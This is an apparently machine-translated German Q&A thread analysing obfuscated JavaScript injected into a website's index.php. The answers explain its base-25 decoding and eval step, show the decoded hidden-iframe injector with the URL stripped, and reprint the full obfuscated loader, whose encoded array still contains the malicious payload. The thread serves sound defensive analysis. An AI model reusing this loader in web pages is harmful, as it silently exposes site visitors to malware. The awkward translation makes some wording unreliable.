Ein Freund meiner Website wurde als bösartig aufgelistet, und wir fanden etwas verschleierten Code, der in seine index.php injiziert worden war, ohne dass er es wusste. Ich deobfuscated den Code unten zwei Ebenen und fanden diese:Kann mir jemand sagen, warum das bösartig ist ..?
(code can be viewed in the edit history)
Kann mir jemand sagen, was es versucht, es zu tun und warum bösartige ..?
Um es zusammenzufassen, wird der Code "decodiert" HTML, die eine , die geladen wird in einer bösartigen URL platziert.
Die folgende Zeile hat den "codierten" HTML:
n = ["9","9","45","42", ...
Jede Zahl stellt ein Zeichen, das in der Basis-25 ist. Der Code durchläuft dieses Array und verwendet JavaScript String.fromCharCode(), um es in ein ASCII-Zeichen zu konvertieren. Nach all dem wird es eval() es auf der Seite platzieren.
Die "decodiert" javascript ist:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Hinweis, habe ich die bösartige URL aus dem Code aus Sicherheitsgründen abgezogen.
Danke! Ich war nur neugierig, was es machte und wie. –
Es fügt einen versteckten iframe in die Seite ein, die mit einer möglicherweise dubiosen Seite verknüpft ist. Hier ist eine sichere Version des Codes Sie ausführen können und sehen, was es zu injizieren versucht ...
Ich besuchte die Website es Links zu und Chrom warnte mich vor Malware, also ging ich nicht weiter.
try{
if(window.document) window["document"]["body"]="123"
}catch(bawetawe){
if(window.document){
v=window;
try{
fawbe--
}catch(afnwenew){
try{
(v+v)()
}catch(gngrthn){
try{if(020===0x10)v["document"]["body"]="123"
}catch(gfdnfdgber){
m=123;
if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];
}
}
n= ["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g"," j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];
h=2;
s="";
if(m) for(i=0;i-589!=0;i++){
k=i;
if(window["document"]) s+=String["fro"+"mC"+"harCode"](
parseInt(n[i],25)
);
}z=s;alert(z);
}
}
}?
Ersetzen Sie "eval" durch "alert", um zu sehen, was es tut. – georg